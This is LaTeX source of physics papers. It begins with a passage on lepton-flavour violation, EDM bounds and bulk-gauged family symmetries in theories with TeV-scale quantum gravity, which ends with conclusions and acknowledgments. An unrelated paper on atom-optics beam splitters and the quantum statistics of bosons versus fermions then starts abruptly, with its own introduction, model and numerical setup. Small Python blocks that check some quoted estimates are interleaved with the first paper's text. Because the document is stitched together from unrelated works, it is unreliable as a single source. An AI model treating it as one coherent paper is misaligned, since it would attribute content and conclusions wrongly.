The suppression of lepton-flavour-violating processes through dimension-$6$ operators
goes much in the same spirit as discussed above for quarks. The constraints on
the $M^l$ mixing angles can be satisfied more easily, since little is known about the
lepton mixing angles.
Dimension-five operators can be more problematic.
For instance, the lowest operator
inducing the $\mu \rightarrow e\gamma$ transition is
\begin{equation}
{H \over M_{Pf}^2} \bar e \sigma^{\mu\nu}\mu F_{\mu\nu}
\end{equation}
This has the same chirality structure as the $m_{\mu e}$ mass term, and thus we expect it to be
suppressed
by the same flavour symmetry that guarantees its smallness.
The exact strength of the suppression factor is very sensitive to the mixing in
the charged lepton mass matrix: it can be as large as $m_{\tau}/M_{Pf}^2$ for
maximal $e-\mu-\tau$ mixing angles, but vanishes if the mixing is absent.
The experimental limit
${\rm Br}(\mu \rightarrow e\gamma) < 5\times 10^{-11}$ translates
into
\begin{equation}
\lambda_{e\mu} < 3\times 10^{-6} \cdot
\left({M_{Pf}\over 1~{\rm TeV}} \right)^2
\end{equation}
which is satisfied for $\lambda_{e\mu}\sim
\sqrt{m_em_\mu}/\langle H\rangle = 4\cdot 10^{-5}$ and
$M_{Pf}\sim 3$ TeV. Analogously, for the $\tau \rightarrow \mu\gamma$
decay ${\rm Br}(\tau \rightarrow \mu\gamma) < 3\times 10^{-6}$
translates into
\begin{equation}
\lambda_{\mu\tau} < 3\times 10^{-2} \cdot
\left({M_{Pf}\over 1~{\rm TeV}} \right)^2
\end{equation}
which is well above the geometrical estimate
$\lambda_{\mu\tau}=
\sqrt{m_\mu m_\tau}/\langle H\rangle = 2.5\cdot 10^{-3}$.
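The geometric estimates quoted above can be reproduced with a few lines of arithmetic. In the sketch below, the lepton masses and $\langle H\rangle \approx 174$ GeV are inputs we assume; they are not specified in the text:

```python
import math

# Charged-lepton masses in GeV and the electroweak VEV (assumed inputs)
m_e, m_mu, m_tau = 0.511e-3, 0.1057, 1.777
vev = 174.0

lam_emu = math.sqrt(m_e * m_mu) / vev      # geometric estimate of lambda_{e mu}
lam_mutau = math.sqrt(m_mu * m_tau) / vev  # geometric estimate of lambda_{mu tau}

assert abs(lam_emu - 4e-5) < 1e-5      # ~ 4 x 10^-5, as quoted
assert abs(lam_mutau - 2.5e-3) < 1e-4  # ~ 2.5 x 10^-3, as quoted

# The mu -> e gamma bound lam < 3e-6 (M_Pf/TeV)^2 then requires
# M_Pf of a few TeV for the geometric value of lam_emu:
M_min_TeV = math.sqrt(lam_emu / 3e-6)
assert 3.0 < M_min_TeV < 4.5
```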
Somewhat stronger constraints come from the electron and
neutron EDMs. For example, the experimental limit
$d_e < 0.3\cdot 10^{-26}~ e\cdot$cm implies
\begin{equation}
{\rm Im}\lambda_{e} < 10^{-9} \cdot
\left({M_{Pf}\over 1~{\rm TeV}} \right)^2
\end{equation}
therefore, for $\lambda_e$ of the order of the electron
Yukawa coupling constant, $\lambda_e \sim m_e/\langle H\rangle \sim
10^{-6}$, with a phase of order 1, one needs to take
$M_{Pf} > 30$ TeV or so. An analogous constraint emerges
from the light-quark (i.e.\ neutron) EDM.
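The quoted scale follows directly from inverting the EDM bound; a one-line check (with $\lambda_e \sim 10^{-6}$ as in the text):

```python
import math

lam_e = 1e-6     # electron Yukawa ~ m_e/<H>, assumed to carry an O(1) phase
bound = 1e-9     # Im(lambda_e) < 1e-9 (M_Pf/TeV)^2 from the d_e limit

M_min_TeV = math.sqrt(lam_e / bound)   # smallest M_Pf evading the bound
assert abs(M_min_TeV - 31.6) < 0.1     # "30 TeV or so"
```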
\subsection{Gauging Flavor Symmetry in the Bulk}
Up to now we have been discussing the suppression of $M_{Pf}$-cutoff
operators by gauged flavor symmetries.
What about flavor violation mediated by the horizontal gauge
fields? Naively, one encounters a puzzle here: in order to suppress
quantum-gravity-induced operators, $G_F$ must survive
at scales below $M_{Pf}$, but in this case
the gauge bosons can themselves induce problematic operators.
The situation is very different if the horizontal gauge
bosons are bulk fields.
The generic procedure of gauging an arbitrary symmetry
in the bulk was discussed in detail in \cite{add*}, where
it was shown that: 1) the effective coupling of the
bulk gauge field and its KK partners to the brane modes
is automatically suppressed by $g_4 \sim M_{Pf}/M_P$ and,
2) whenever the symmetry is broken on the brane
(only),
the mass of the gauge field is suppressed by $\sim M_{Pf}/M_P$,
independently of the number of extra dimensions.
In other words, as it should be, a symmetry broken on
the brane is ``felt'' by the brane fields much more
strongly than by the bulk modes. This is not
surprising, since the bulk modes ``spend'' much more
time in the bulk, where the symmetry is
unbroken.
Consider a gauge field of some symmetry group
$G$ propagating in the bulk. We will assume the scale
of the original
$4 + N$ - dimensional gauge coupling to be
$g_{(4 + N)} \sim M_{Pf}^{-{N \over 2}}$.
From the $4$-dimensional point of view, this
gauge field represents an infinite number of KK
states, out of which only the zero mode $A_{\mu}^0$
shifts under the $4$-dimensional local
gauge transformation, whereas its KK partners are massive states.
All these states couple to the gauge-charged matter localized on
the brane through an effective
four-dimensional gauge coupling
\begin{equation}
g_4^2 \sim 1/(RM_{Pf})^N \sim M^2_{Pf}/M_P^2
\end{equation}
Consequently, if any of the Higgs scalars localized
on the brane gets a nonzero VEV,
$\langle \chi (x_A)\rangle = \delta(x_A - x_A^0)\langle \chi \rangle$
(where $x_A^0$ are the coordinates of the brane),
all the bulk states get a minuscule mass shift
\begin{equation}
\delta m^2 \sim \langle \chi \rangle^2 M^2_{Pf}/M_p^2 \label{wallshift}
\end{equation}
On the other hand if the Higgs scalar is a
bulk mode and its VEV is not localized on the
brane, but rather is constant in the bulk,
the gauge fields get an unsuppressed mass shift
\begin{equation}
\delta m^2 \sim \langle \chi \rangle^2/ M^N_{Pf} \label{bulkshift}
\end{equation}
Note that the bulk scalar $\chi$ has
dimensionality of $({\rm mass})^{1 + N/2}$.
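The volume dilution $g_4^2 \sim 1/(RM_{Pf})^N \sim M_{Pf}^2/M_P^2$ can be verified numerically from the standard relation between the fundamental and the four-dimensional Planck masses, $M_P^2 \sim M_{Pf}^{N+2}R^N$. The convention below, with all $O(1)$ factors dropped, is our assumption:

```python
M_Pf = 1.0e3   # GeV: TeV-scale fundamental gravity
M_P = 1.2e19   # GeV: four-dimensional Planck mass

for N in (2, 3, 6):
    # compactification radius (in GeV^-1) from M_P^2 = M_Pf^(N+2) R^N
    R = (M_P**2 / M_Pf**(N + 2)) ** (1.0 / N)
    g4_sq = 1.0 / (R * M_Pf) ** N      # diluted 4d gauge coupling squared
    assert abs(g4_sq / (M_Pf / M_P) ** 2 - 1.0) < 1e-9
```

The identity holds exactly for any $N$: substituting $R^N = M_P^2/M_{Pf}^{N+2}$ gives $1/(RM_{Pf})^N = M_{Pf}^2/M_P^2$.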
What is the implication of these facts for the flavor symmetry?
Let $G_F = U(3)_F$ be a vector-like family symmetry under
which all the fermions are triplets, and let us estimate the
flavor violation induced by the exchange of its gauge fields.
Consider for instance $M^0 - \bar M^0$ transitions
(where $M = K, B, D$). Obviously, if $U(3)_F$ were unbroken,
the four-fermion operators induced by this exchange
would never contribute to any of
these processes, since the only possible invariant is
\begin{equation}
(\bar q^a q_a)(\bar q^b q_b) \label{flavor-conserving}
\end{equation}
However, $U(3)_F$ must be broken in order to account for
the hierarchy of fermion
masses. Let $\chi$ be the Higgs that does this breaking.
We can consider three options:
{\bf 1. Breaking occurs only on the brane}.
Unfortunately this option is ruled out for the following reason.
If $U(3)_F$ is broken on the brane, then there must be
massless pseudo-scalar modes localized on it.
These are the Goldstone bosons (familons \cite{familon}) of the broken
$U(3)_F$, which have both flavor-diagonal and
flavor-non-diagonal couplings to
ordinary matter, suppressed by $\langle \chi \rangle$.
This is excluded for various astrophysical and
laboratory reasons \cite{familon,familonruled}.
At first glance, in the present context
this statement may come as a surprise,
since by assumption $U(3)_F$ is a gauge symmetry and
thus the troublesome familons must be eaten
up by the gauge fields. Recall, however, that the gauge coupling is
abnormally small (and the scale of symmetry breaking is not large).
In such a situation it is more useful to argue in terms of
the massless Goldstones rather than the massive gauge bosons.\footnote{
The situation is analogous to the case of low-energy
supersymmetry, where the dominant coupling of the gravitino is provided
by its goldstino component.}
Thus we are left with the following option.
{\bf 2. Breaking occurs in the bulk}.
In this case the familons are bulk modes and are
totally safe, for the same reason as the bulk gravitons \cite{add*}.
Thus the dominant contribution to the flavor violation is provided
by the gauge components. Let us estimate this
contribution to the effective four-Fermi operators
mediating $M^0 - \bar M^0 $ processes. It comes from
the tree-level exchange of an infinite tower of KK states.
The mass of each individual KK mode is
\begin{equation}
m^2_K = \langle \chi \rangle^2/ M^N_{Pf} + {|n|^2 \over R^2}
\end{equation}
where $|n| = \sqrt{n_A^2}$ and $n_A$ are integers.
The second contribution is flavor-universal.
Thus for the heavy states the flavor violation will be suppressed by
$\sim \langle \chi \rangle^2 R^2/ M^N_{Pf}|n|^2$.
Note that the same scalars are responsible for the fermion masses through
\begin{equation}
\int dx^{4 + N} \delta(x_A){\chi_{b}^a \over
M_{Pf}^{1 + {N \over 2}}} H \bar Q_{La}q_R^b \label{chibulk}
\end{equation}
where the dimensionality of the denominator comes from the fact
that $\chi$ is a bulk mode. Thus the
$U(3)_F$-violating mass can be parameterized as
\begin{equation}
\langle \chi \rangle^2/ M^N_{Pf} = (\lambda M_{Pf})^2
\end{equation}
where $\lambda$ is roughly the Yukawa coupling of the fermion
(e.g.\ for $U(2)_H$ gauge bosons $\lambda$ can be taken to be
$\sim m_c/\langle H\rangle \sim 10^{-2}$ or so).
It is useful to evaluate contributions of the modes
${|n|^2 \over R^2} < (\lambda M_{Pf})^2$ and
${|n|^2 \over R^2} > (\lambda M_{Pf})^2$ separately.
Each of the former modes generates an operator scaled by
${g_4^2 \over (\lambda M_{Pf})^2}$,
whereas their multiplicity is roughly
$\sim (\lambda M_{Pf}R)^N$. Therefore their
combined effect gives an effective four-fermion operator scaling as
\begin{equation}
\sim {\lambda^{N - 2} \over M_{Pf}^2}. \label{scaling}
\end{equation}
The flavor violating contribution of the modes with
${|n|^2 \over R^2} > (\lambda M_{Pf})^2$ is crudely
given by the sum
\begin{equation}
\sum_{n_A} {g_4^2R^4 \over |n|^4} (\lambda M_{Pf})^2
\sim g_4^2R^4 (\lambda M_{Pf})^2 |n|^{N - 4} |_{min}^{max}
\end{equation}
and is power-divergent for $N > 4$.
Cutting off this sum from above at
$|n|_{{\rm max}} \sim (M_{Pf}R)$, we find that the
amplitude goes as
\begin{equation}
\sim {\lambda^2 \over M_{Pf}^2} \left ( 1 - \lambda^{N - 4} \right ) \label{scaling2}
\end{equation}
Thus we see that the dominant contribution comes from the lowest modes.
Combining everything we get that for $N > 3$ the operators scale as
\begin{equation}
\sim {\lambda^2 \over M_{Pf}^2}
\end{equation}
and are problematic even if
$\lambda \sim 10^{-2}-10^{-3}$.
The case $N < 4$ is even more problematic and,
in particular, there is no suppression for $N = 2$.
At first glance this may come as a surprise,
since in the limit $\lambda \rightarrow 0$ the transition
should be absent. Note, however, that this does not
contradict the above result: once
$\lambda M_{Pf}$ becomes smaller than the meson
mass $m_{M}$, an additional power suppression
$\sim {\lambda M_{Pf} \over m_{M}}$ must appear
in the flavor-violating transition amplitude.
Thus, we are led to the third option.
{\bf 3. Gauge fields and familons on branes of different dimensionality.}
Imagine that the flavor Higgs fields are not $3$-brane modes but live in a space of larger
dimensionality. Unlike the gauge fields, however,
they can only propagate in a bulk of fewer dimensions, $N'< N$. That is, assume that
they live on a $3 + N'$-brane which contains our $3$-brane Universe as a subspace.
When the breaking occurs on the $3 + N'$-brane, both the masses of the bulk
gauge fields and the couplings of the familons to the standard model fermions will
be suppressed by volume factors. The question is whether, for certain
values of $N'< N$, both gauge- and familon-mediated processes can be adequately
suppressed. Consider first some gauge-mediated FCNP. Since the $\chi$'s are $4 +
N'$-dimensional
fields, according to (\ref{chibulk}) their VEV can be parameterized as
\begin{equation}
\langle \chi \rangle^2/ M^{N'}_{Pf} = (\lambda M_{Pf})^2
\end{equation}
The resulting flavor-non-universal mass for each gauge KK mode is
\begin{equation}
m_{fv}^2 = {(\lambda M_{Pf})^2 \over (M_{Pf}R)^{N - N'}}
\end{equation}
or, translated in terms of $M_P$, $m_{fv}^2 =
(\lambda M_{Pf})^2 (M_{Pf}/M_P)^{{2(N - N') \over N}}$. For the gauge-mediated
flavor violation to be suppressed, this should be smaller than the typical
momentum transfer in the $M^0 - \bar M^0$ process. If this is the case,
then the contributions to the process from the light ($\ll m_M$) and heavy
($\gg m_M$) modes go as $m_{fv}^2m_M^{N - 4}/M_{Pf}^N$ and
$m_{fv}^2/M_{Pf}^4$, respectively, and are suppressed. Now let us turn to the familon
couplings. Since $\chi$ are $4 + N'$ dimensional fields, so are the familons and their
effective decay constant is\cite{add*}
\begin{equation}
1/(\lambda M_{Pf})(M_{Pf}R)^{N'/2}
\end{equation}
Again because of the bulk-multiplicity factor their emission rate is
amplified. For instance the star-cooling rate becomes\cite{add*}
\begin{equation}
\sim (\lambda M_{Pf})^{-2}(T/M_{Pf})^{N'}
\end{equation}
where $T$ is the temperature of the star. This is safe for $N' > 2$, even for $M_{Pf}
\sim$ TeV. The contributions from the light and heavy modes to familon-mediated flavor-violating
amplitudes are suppressed as
\begin{equation}
{1 \over (\lambda M_{Pf})^2}(m_M /M_{Pf})^{N'}
\end{equation}
and
\begin{equation}
{\lambda^{N'- 4}m_M^2 \over M_{Pf}^4}
\end{equation}
respectively.
Finally, let us consider flavor-violating operators induced by the
horizontal Higgses. These can be analyzed much in the same way
as was done above for the gauge fields. If the non-zero VEV occupies the
whole $3 + N'$-brane volume in which the Higgs can freely propagate, then the
resulting dangerous operators scale as the larger of (\ref{scaling}) and
(\ref{scaling2}),
where now $N$ must be understood as the number of dimensions
in which the Higgs can propagate. This is very much like the gauge contribution
in the case of bulk breaking. The difference is that the horizontal Higgses carry an extra
suppression factor $\sim (m_W/M_{Pf})^2$ and are therefore relatively safer.
\subsubsection{Custodial $SO(4)_F$}
We must stress that there may very well be group-theoretical
cancellations which weaken the above constraints.
For instance, imagine that the $U(2)_F$ symmetry is broken by a
doublet VEV $\chi_a$. The gauge boson masses generated in this
way are automatically $SU(2)$ invariant, due to
the {\it custodial}
global $SO(4)$ symmetry (just as in the standard model)
of the coupling
\begin{equation}
g^2 (\chi^{*a}\chi_a)A_{\nu}^\alpha A^{\nu\alpha}
\end{equation}
As a result, in the leading order the $U(2)_F$-non-invariant
operator structures must cancel out.
\subsection{Conclusions}
Adopting the philosophy that quantum gravity explicitly breaks global symmetries
via all possible operators scaled by powers of $M_{Pf}^{-1}$, we have studied some
implications of this
fact for flavor violation in theories with TeV-scale quantum gravity\cite{add}.
In these theories the ordinary fermions are localized on a $3$-brane embedded in
a space with $N$ new dimensions. We have discussed the most dangerous
and model-independent operators and their suppression by gauged family symmetries.
Non-Abelian symmetries (such as $U(2)_F$) broken below a TeV seem to be a necessity in this
picture, but they are by no means sufficient for FCNP suppression. Additional constraints
arise on the structure of the fermion mass matrices and on the higher-dimensional bulk
properties of the
horizontal gauge fields. All the ``safe'' versions seem to converge to structures in
which,
at best, only two generations can have significant mixing in each mass matrix. In
particular, this rules out all possible ``democratic'' structures, in which the mixing is maximal
among all three families.
To suppress gauge-mediated flavor violation and avoid the standard bounds on the scale of
flavor symmetry breaking, the horizontal symmetry should be gauged in the bulk.
If the breaking occurs in the bulk, the flavor violation is somewhat reduced
only for a large enough number of new dimensions ($N > 2$). On the other hand, if the breaking
occurs in a subspace with $N'< N$, the gauge-mediated contribution can be strongly
suppressed; but unless $N'$ is also large, the would-be familons, which are localized
on the $3 + N'$-brane, can mediate unacceptable flavor violation.
Combining all the potential sources, it seems that, unless an extra source
of suppression is implemented ``by construction'', FCNP are quite close to their experimental limits.
\acknowledgments
We thank Denis Comelli, Glennys Farrar and Gregory Gabadadze for very
useful discussions. We learned from Savas Dimopoulos about the complementary
paper \cite{savasnima}; we thank him for discussions. Before submitting this paper we
became aware
of a number of new papers \cite{new1}-\cite{new4} on the phenomenology and cosmology of
TeV-scale quantum gravity.
\section{Introduction}
The duality between wave and particle aspects is one of the central issues
of Quantum Mechanics. Much has been made of the particle aspects of photons,
but recent progress in cooling and controlling atomic motion has brought
the wave-mechanical behavior of atoms to the fore. The new field of
Atomic Optics has emerged \cite{ada}.
With modern cooling and trapping techniques, one can envisage the controlled
motion of atomic particles in structures whose mechanical dimensions
match those of the heterostructures used in electronic circuits. Neutral atoms can be
stored in magneto-optical traps, and H\"{a}nsch and his group
have recently shown \cite{haen} that such traps can be made very small,
{\it viz.} of the order of $10^2\mu{\rm m}$.
This requires high precision in the fabrication of the solid structures
defining the dimensions of the trap. Modern lithographic technology
suggests that such structures could be made even much smaller, and then we
can imagine experiments in traps of genuinely microscopic dimensions, where
quantum effects would dominate the particle dynamics. H\"{a}nsch has also
suggested that such traps could be made into channels and structures, thus
providing a tool to design arbitrary devices at the surface of a substrate.
Similar structures can be constructed by combining charged wires with
evanescent wave mirrors \cite{ess,sei} or magnetic mirrors \cite{roa}.
Such combinations can be used to build up the structures utilized in
nano-electronics. The use of wires to guide atomic motion has been
investigated by Denschlag and Schmiedmayer \cite{den}. Schmiedmayer
has also discussed the use of such structures to construct quantum
dots and quantum wires for atoms \cite{sch}.
An alternative way to achieve guided motion, and possibly controlled
interaction between atoms, is to utilize hollow optical fibers with
evanescent waves trapping the atoms in narrow channels at the center of
the fiber \cite{ito,yin}. These can eventually be fused to provide
couplers similar to those used for optical signal transmission in
fibers. Purely optical atomic waveguides based on hollow laser modes
may also be used.
We see these methods as an opening to novel and innovative uses
of particle traps. By arranging a network of grooves on a surface,
we can launch particles (wave packets) into the various inputs of
the system, let them propagate through the device and interact with
its structures and each other. This may well provide an opportunity
to design quantum apparatuses, process information and perform
computations. The advantage is that both the structures and the input
states are easy to control in an atomic environment. An equivalent
point of view is expressed by Schmiedmayer in Ref. \cite{sch}.
The next step in this experimental progress would be to observe the quantum
character of atoms (or possibly ions).
An essential quantum characteristic of particles is their statistical
behavior. The difference between bosons and fermions manifests
itself dramatically in many situations. Optical networks can be
fed by a few photons only, and their quantum aspects have been
utilized in experiments
ranging from secure communication to tests of fundamental issues. Recently
Zeilinger and his group \cite{zeil} have tested the behavior of two-photon
states at beam splitters. Using the overall symmetry properties of the
states, they have been able to display both symmetric and antisymmetric
behavior.
Similar experiments are in principle possible with electrons. In
nanostructures, one can fabricate the devices simulating optical components,
but it is far less trivial to launch single conduction electrons in well
controlled states. Yamamoto's group, however, has been able to show quantum
correlations in an experiment which is the analogue of a beam splitter for
photons \cite{yama}.
In this paper we give an example of the multiparticle effects
observable when particle states are launched along potential grooves
on a surface. The specific phenomenon singled out for investigation is
the effect of particle statistics at a beam-splitter-like coupling
device. The corresponding effect with photons is described in Sec. II
as a motivation.
In Sec. III we present the details of the model chosen and a
simplified analytic treatment demonstrating the main features expected
of this model. In Sec. IV we carry through a numerical analysis of the
situation, for one particle as a two-dimensional propagation problem,
but for two particles in a paraxial approximation. For non-interacting
particles, the expected behavior is found, but when particle
interactions are added, the boson behavior is changed. For fermions
the exclusion principle makes them essentially insensitive to the
interaction. An unexpected feature is found: the sign of the
interaction is irrelevant for the effect. In Sec. V this is explained
within our simple analytic model, and, as a consequence, a certain
universality is proposed: when the ratio of the interaction strength to the
tunneling frequency becomes of the order of $\sqrt{3}$, the
noninteracting bosonic behavior is essentially destroyed. This is
verified by numerical calculations, reported in Fig. 13. Finally,
Sec. VI presents a discussion of the parameter ranges in real materials
where our effects may be observable, and summarizes our conclusions.
\section{Motivation}
In order to show the opportunities offered by atomic networks, we
investigate the
manifestations of quantum statistics in an experiment emulating the
behavior of photons in beam splitters. This is a straightforward approach,
which enables us to display the potentialities and limitations of such
treatments.
Our work has been motivated by the statistics displayed by a 50-50
beam splitter, which has been used in the experiments by the Zeilinger
group \cite{zeil}.
When two particles are directed into the beam splitter in the incoming
modes in Fig. \ref{bs},
they are piloted into the outgoing modes according to the beam splitter
relations
\begin{equation}
\left[\begin{array}{c}
a_{\rm{out}}^{\dagger } \\
b_{\rm{out}}^{\dagger }
\end{array}\right]
=\frac 1{\sqrt{2}}
\left[\begin{array}{c c}
1 & -i \\
-i & 1
\end{array}\right]
\left[\begin{array}{c}
a_{\rm{in}}^{\dagger } \\
b_{\rm{in}}^{\dagger }
\end{array}\right]; \label{a1}
\end{equation}
see Ref. \cite{leo}.
When one particle is directed into each incoming channel, the state is
\begin{equation}
| \Psi \rangle =a_{\rm{in}}^{\dagger }b_{\rm{in}}^{\dagger }| 0\rangle ,
\label{a2}
\end{equation}
where $|0\rangle$ is the vacuum state. Without assuming anything about
the statistics of the incoming particles, we can express the state
(\ref{a2}) in terms of the outgoing states by inverting the relation
(\ref{a1}) as
\begin{equation}
| \Psi \rangle =\frac i2\left[ \left( a_{\rm{out}}^{\dagger }\right)
^2+\left(
b_{\rm{out}}^{\dagger }\right) ^2\right] | 0\rangle +\frac 12\left[
a_{\rm{out}}^{\dagger },b_{\rm{out}}^{\dagger }\right] | 0\rangle . \label{a3}
\end{equation}
From this follows that boson statistics gives
\begin{equation}
| \Psi \rangle =\frac i{\sqrt{2}}\left( | n_{a,\rm{out}}=2,n_{b,\rm{out}}=
0\rangle +| n_{a,\rm{out}}=0,n_{b,\rm{out}}=2\rangle \right) ; \label{a4}
\end{equation}
the particles emerge together at either output. For fermions we have
\begin{eqnarray}
| \Psi \rangle &=&a_{\rm{out}}^{\dagger }b_{\rm{out}}^{\dagger }
| 0\rangle \label{a5}\\
&=& | n_{a,\rm{out}}=1,n_{b,\rm{out}}=1\rangle, \nonumber
\end{eqnarray}
and they always remain separated.
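The bunching and antibunching encoded in Eqs. (\ref{a4}) and (\ref{a5}) can be checked numerically: expressing the in-operators through the out-operators with $U^{\dagger}$, the two-particle output amplitudes are permanents (bosons) or determinants (fermions) of $2\times 2$ submatrices. A minimal sketch of this check:

```python
import numpy as np

# the 50-50 beam splitter matrix defined above
U = np.array([[1, -1j], [-1j, 1]]) / np.sqrt(2)
T = U.conj().T   # in-operators expressed through out-operators

# One particle in each input port: the two-particle state is
# sum_{k,l} T[0,k] T[1,l] a_k^dag a_l^dag |0>.
coinc_boson = T[0, 0] * T[1, 1] + T[0, 1] * T[1, 0]   # permanent
coinc_fermi = T[0, 0] * T[1, 1] - T[0, 1] * T[1, 0]   # determinant

assert abs(coinc_boson) < 1e-12           # bosons never exit separately
assert abs(abs(coinc_fermi) - 1) < 1e-12  # fermions always do

# Bosons bunch: probability 1/2 for both exiting the same port
p_both_a = 2 * abs(T[0, 0] * T[1, 0]) ** 2  # factor 2 from (a^dag)^2|0> = sqrt(2)|2>
assert abs(p_both_a - 0.5) < 1e-12
```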
Weihs et al. \cite{zeil} have been able to verify these properties
experimentally using photons. As the requirements of quantum statistics
refer only to the total wave functions, they have been able to realize both
the symmetric and the antisymmetric case, thus displaying the behavior of
both bosons and fermions.
Photons are ideal for experiments: they do not interact mutually, and they
propagate essentially undisturbed in vacuum. As models for quantum systems,
they have the drawback that they cannot be localized, their wave packets are
of rather elusive character, and the influence of particle interactions
cannot be established. Thus we have chosen to discuss the propagation of
massive particles through beam-splitter-like structures. As explained above,
such experiments may be performed with atoms or electrons in traps of
microscopic dimensions. We can thus investigate the propagation of wave
packets through these structures, explore the role of quantum statistics
and switch on and off the particle interaction at will.
\section{The model}
\label{smod}
We consider particles moving in potential
wells which form grooves over a two-dimensional surface. These may cross or
couple by tunneling when approaching each other, thus forming a network of
potential channels emulating a linear optical system.
Here we consider two separate channels which run parallel for $z\rightarrow
\pm \infty $ and approach each other in the $x$-direction, as shown in
Fig. \ref{pot}. For simplicity we construct the potential from two harmonic
oscillators
\begin{equation}
U_{\pm }(x)=\frac 12m\omega ^2(x\pm{1\over 2}d)^2, \label{a6}
\end{equation}
so that a double well potential can be obtained by
writing
\begin{eqnarray}
U(x,z) & = & {U_{+}(x,z)\,U_{-}(x,z) \over U_{+}(x,z)+U_{-}(x,z)}\label{a7}\\
& = & \frac 12m\omega ^2 {{\left( x+{1\over 2}d(z)\right) ^2
\left( x-{1\over 2}d(z)\right) ^2}
\over{\left( x+{1\over 2}d(z)\right) ^2+\left( x-{1\over 2}d(z)\right)
^2}} \nonumber.
\end{eqnarray}
If we now choose $d(z)$ in a suitable manner, we can achieve the potential
behavior shown in Fig. \ref{pot}. Note that at the minima, the potential
$U(x,z)$ essentially follows the shape of the smaller potential $U_{\pm }$.
We consider a wave packet sitting stationary near the bottom of one
well at
$z=0,$ where the distance between the wells is at its minimum $d_0$.
The particle can then tunnel across the barrier with the rate
\begin{equation}
T\sim \exp \left[ -\int \sqrt{2mU(x,0)}dx\right] \approx
\exp \left[ -\kappa \sqrt{U(0,0)}d_0\right] , \label{a8}
\end{equation}
where $\kappa $ is some constant. From Eq. (\ref{a7}) we see that
$U(0,0)\propto d_0^2$ so that we expect
\begin{equation}
\log T\sim -\kappa ^{\prime }d_0^2+\rm{const}. \label{a9}
\end{equation}
In order to acquire a heuristic understanding of the physics involved in the
coupling of the grooves at $z=0,$ we look at the lowest eigenfunctions
of the double well potential. These are expected to be symmetric,
$\psi _S$, with energy $E_S$, and antisymmetric, $\psi _A$, with
energy $E_A$, as shown in Fig. \ref{eigen}.
We have $E_A>E_S$ and hence we write
\begin{eqnarray}
E_A & = & \overline{E}+\hbar \Omega \nonumber\\
E_S & = & \overline{E}-\hbar \Omega,
\label{a11}
\end{eqnarray}
where $2\Omega $ is the tunneling frequency.
Using the eigenstates we form the localized states
\begin{eqnarray}
\varphi _L & = & \frac 1{\sqrt{2}}\left( \psi _S+\psi _A\right) \nonumber\\
\varphi _R & = & \frac 1{\sqrt{2}}\left( \psi _S-\psi _A\right),
\label{a12}
\end{eqnarray}
where the subscripts $L$ $(R)$ denote left (right) localization.
We can easily integrate the time evolution by using the energy
eigenstates. If we now assume that we start from $\varphi _L$ at time
$t=0$, then
\begin{eqnarray}
\Psi (t) & = & \exp \left( -iHt/\hbar \right) \varphi _L \nonumber \\
& = & {1\over\sqrt{2}} \exp \left( -i\overline{E}t/\hbar \right)\left(
e^{i\Omega t}\psi _S+e^{-i\Omega t}\psi _A\right) \label{a13}\\
& = & \exp \left( -i\overline{E}t/\hbar \right) \left( \cos \Omega
t\,\varphi _L+i\sin \Omega t\,\varphi _R\right) .\nonumber
\end{eqnarray}
This displays the expected flipping back and forth between the two wells.
For
\begin{equation}
\Omega t_0=\frac \pi 4 \label{a14}
\end{equation}
the coupling performs the action of a 50-50 beam splitter.
We now move to consider the action of such a potential configuration on a
two particle initial state. We first choose the bosonic one
\begin{equation}
\Psi _0^B=\frac 1{\sqrt{2}}\left( \varphi _L(1)\varphi _R(2)+\varphi
_L(2)\varphi _R(1)\right) , \label{a15}
\end{equation}
where the argument denotes the coordinates of the particle. This can be
expressed as
\begin{equation}
\Psi _0^B=\frac 1{\sqrt{2}}\left( \psi _S(1)\psi _S(2)-\psi _A(1)\psi
_A(2)\right) , \label{a16}
\end{equation}
which can be evolved in time straightforwardly to give
\begin{eqnarray}
\exp \left( -iHt_0/\hbar \right) \Psi _0^B & = &{1\over \sqrt{2}}
\exp \left( -i2\overline{E}t_0/\hbar \right) \left( e^{i2\Omega t_0}\psi
_S(1)\psi _S(2)-e^{-i2\Omega t_0}\psi _A(1)\psi _A(2)\right) \nonumber\\
& = & {i\over\sqrt{2}}\exp \left( -i2\overline{E}t_0/\hbar \right)
\left( \varphi _L(1)\varphi _L(2)+\varphi _R(2)\varphi _R(1)\right) .
\label{a17}
\end{eqnarray}
As we see, the bosonic two particle
state works as in Eq. (\ref{a4}): both particles emerge together.
In the fermionic case we have
\begin{eqnarray}
\Psi _0^F & = & \frac 1{\sqrt{2}}\left( \varphi _L(1)\varphi _R(2)-\varphi
_L(2)\varphi _R(1)\right)\nonumber\\
& = & \frac 1{\sqrt{2}}\left( \psi _A(1)\psi _S(2)-\psi _S(1)\psi
_A(2)\right) . \label{a18}
\end{eqnarray}
Because both states $\psi _A\psi _S$ and $\psi_S\psi_A$
evolve with the energy $2\overline{E}$, $\Psi _0^F$
remains uncoupled to other states. Thus the fermions emerge at
separate exit channels as expected.
\section{Numerical work}
\subsection{The Schr\"{o}dinger equation}
\label{num}
The Schr\"{o}dinger equation in the two-dimensional system is of the form
\begin{equation}
i\hbar \frac \partial {\partial t}\Psi (x,z,t)=\left[ -\frac{\hbar ^2}{2m
}\left( \frac{\partial ^2}{\partial x^2}+\frac{\partial ^2}{\partial z^2}
\right) +U(x,z)\right] \Psi (x,z,t). \label{a19}
\end{equation}
As a preparation for the numerical work, we introduce the scaling parameters
$\tau $ and $\xi $ giving the dimensionless variables
\begin{eqnarray}
\widetilde{x} & = & x/\xi \nonumber\\
\widetilde{z} & = & z/\xi \label{a20} \\
\widetilde{t} & = & t/\tau \nonumber \\
\widetilde{p} & = & \tau p/m\xi .\nonumber
\end{eqnarray}
We apply this to the one-dimensional oscillator Hamiltonian
\begin{equation}
H=\frac{p^2}{2m}+\frac 12m\omega ^2x^2 \label{a21}
\end{equation}
and find the Schr\"{o}dinger equation
\begin{equation}
i\left( \frac{\hbar \tau }{m\xi ^2}\right) \frac \partial {\partial
\widetilde{t}}\Psi =\left( \frac{\widetilde{p}^2}2+\frac 12\widetilde{\omega
}^2\widetilde{x}^2\right) \Psi . \label{a22}
\end{equation}
The dimensionless oscillator frequency is given by
$\widetilde{\omega }=\omega \tau $. This shows that choosing the
scaling units suitably, we can
tune the effective dimensionless Planck constant
\begin{equation}
\widetilde{\hbar }=\frac{\hbar \tau }{m\xi ^2}. \label{a23}
\end{equation}
To check the consistency of this we calculate
\begin{equation}
\left[ \widetilde{x},\widetilde{p}\right] =\left( \frac 1\xi \right) \left(
\frac \tau {m\xi }\right) \left[ x,p\right] =i\widetilde{\hbar }.
\label{a24}
\end{equation}
This gives us a way of controlling the quantum effects in the numerical
calculations.
